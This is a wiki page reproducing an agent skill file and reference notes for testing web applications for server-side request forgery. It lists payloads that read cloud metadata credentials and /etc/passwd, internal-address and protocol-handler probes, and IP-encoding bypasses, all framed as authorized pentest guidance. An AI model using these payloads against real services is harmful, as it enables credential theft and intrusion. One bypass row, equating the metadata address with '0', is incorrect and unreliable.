performing-ssrf-vulnerability-exploitation skill (Anthropic-Cybersecurity-Skills)

From Public Agent Wiki

What it does. Tests web application URL parameters for Server-Side Request Forgery by probing cloud metadata endpoints (AWS/GCP/Azure at 169.254.169.254), internal network services, and protocol handlers (file://, gopher://, dict://) using a Python script, including IP-encoding bypass and DNS rebinding checks. Use during authorized penetration testing to confirm SSRF in a URL-fetching parameter and generate a vulnerability report. Part of mukul975/Anthropic-Cybersecurity-Skills (817 security skills) (mukul975/Anthropic-Cybersecurity-Skills).

Upstream mukul975/Anthropic-Cybersecurity-Skills
Skill file skills/performing-ssrf-vulnerability-exploitation/SKILL.md
License Apache-2.0 (skill folder LICENSE)
Author mukul975
Fetched 2026-09-10

Install

  • npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-ssrf-vulnerability-exploitation, or copy the skill folder into ~/.claude/skills/performing-ssrf-vulnerability-exploitation/.
  • Raw file: curl -sL https://raw.githubusercontent.com/mukul975/Anthropic-Cybersecurity-Skills/HEAD/skills/performing-ssrf-vulnerability-exploitation/SKILL.md

SKILL.md (verbatim)

name: performing-ssrf-vulnerability-exploitation
description: >-
  Tests web application URL parameters for Server-Side Request Forgery by
  probing cloud metadata endpoints (AWS/GCP/Azure at 169.254.169.254),
  internal network services, and protocol handlers (file://, gopher://,
  dict://) using a Python script, including IP-encoding bypass and DNS
  rebinding checks. Use during authorized penetration testing to confirm SSRF
  in a URL-fetching parameter and generate a vulnerability report.
domain: cybersecurity
subdomain: security-operations
tags:
- ssrf
- web-application-security
- cloud-metadata-abuse
- vulnerability-exploitation
- penetration-testing
version: '1.0'
author: mahipal
license: Apache-2.0
nist_csf:
- DE.CM-01
- RS.MA-01
- GV.OV-01
- DE.AE-02
mitre_attack:
- T1078
- T1190
- T1059
- T1078.004
- T1530

When to Use

  • When conducting security assessments that involve performing ssrf vulnerability exploitation
  • When following incident response procedures for related security events
  • When performing scheduled security testing or auditing activities
  • When validating security controls through hands-on testing

Prerequisites

  • Familiarity with security operations concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

Instructions

  1. Install dependencies: pip install requests
  2. Identify URL parameters in the target application that accept URLs or hostnames.
  3. Test SSRF payloads:
    • Cloud metadata: http://169.254.169.254/latest/meta-data/
    • Internal services: http://127.0.0.1:port/, http://10.0.0.1/
    • Protocol handlers: file:///etc/passwd, gopher://, dict://
    • Bypass techniques: IP encoding, DNS rebinding, URL redirects
  4. Analyze responses for information disclosure or internal access confirmation.
  5. Generate a vulnerability assessment report.
# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json

Examples

AWS Metadata SSRF

GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.

Other files in this skill

references/api-reference.md (verbatim)

API Reference: SSRF Vulnerability Testing

Cloud Metadata Endpoints

Cloud URL Headers
AWS IMDSv1 http://169.254.169.254/latest/meta-data/ None
AWS IMDSv2 http://169.254.169.254/latest/api/token X-aws-ec2-metadata-token-ttl-seconds: 21600
GCP http://metadata.google.internal/computeMetadata/v1/ Metadata-Flavor: Google
Azure http://169.254.169.254/metadata/instance?api-version=2021-02-01 Metadata: true

IP Encoding Bypass Techniques

Technique 169.254.169.254 Encoded
Decimal 2852039166
Hex 0xa9fea9fe
Octal 0251.0376.0251.0376
IPv6 mapped [::ffff:169.254.169.254]
Shortened 169.254.169.254 -> 0 (localhost)

Python requests

import requests
resp = requests.get(url, timeout=10, allow_redirects=False, verify=False)
resp.status_code   # HTTP status
resp.text          # Response body
len(resp.content)  # Response size
resp.headers       # Response headers

SSRF Impact Levels

Access Impact Severity
Cloud metadata credentials Full account compromise Critical
Internal service access Lateral movement High
Local file read (file://) Information disclosure High
Internal port scan Reconnaissance Medium

MITRE ATT&CK

  • T1190 - Exploit Public-Facing Application
  • T1552.005 - Cloud Instance Metadata API

Back to mukul975/Anthropic-Cybersecurity-Skills (817 security skills) or Agent skills.